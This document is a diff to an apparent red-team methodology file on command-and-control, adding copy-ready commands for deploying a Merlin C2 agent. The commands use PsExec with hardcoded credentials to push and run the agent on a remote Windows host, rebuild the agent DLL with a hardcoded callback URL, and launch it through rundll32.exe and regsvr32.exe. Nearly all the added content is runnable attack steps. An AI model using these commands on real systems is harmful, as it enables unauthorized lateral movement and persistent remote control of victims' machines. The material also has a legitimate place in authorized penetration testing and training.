--- a/Methodology/C2.md
+++ b/Methodology/C2.md
@@ -93,8 +93,34 @@ C:\Users\Bob\Downloads>merlinAgent.exe -url https://192.168.1.100:443/
 C:\Users\Bob\Downloads>C:\WINDOWS\System32\rundll32.exe merlin.dll,Run https://192.168.1.100:443/
 ```
 
-
 ### Windows Remote Execution
+
+#### PsExec.exe
+```cmd
+PS C:\SysinternalsSuite>.\PsExec.exe \\192.168.1.10 -u bob -p password -d -c C:\merlin\data\bin\windows\merlinAgent.exe -url https://192.168.1.100:443/
+```
+
+### Recompiling DLL
+The merlin.dll file can be configured with the hardcoded url of your Merlin server. To do this, clone the repo, modify the file, and recompile it.
+```bash
+cd /opt
+git clone -b dev https://github.com/Ne0nd0g/merlin-agent-dll.git
+cd merlin-agent-dll
+sed -i 's_https://127.0.0.1:443/_https://192.168.1.100:443/_' main.go
+make
+```
+Running dll with rundll32.exe
+```cmd
+rundll32.exe merlin,main
+rundll32.exe merlin,Run
+```
+with regsvr32.exe
+```cmd
+regsvr32.exe /s merlin.dll
+regsvr32.exe /s /u merlin.dll
+regsvr32.exe /s /n /i merlin.dll
+```
 
 
 # Nishang
+
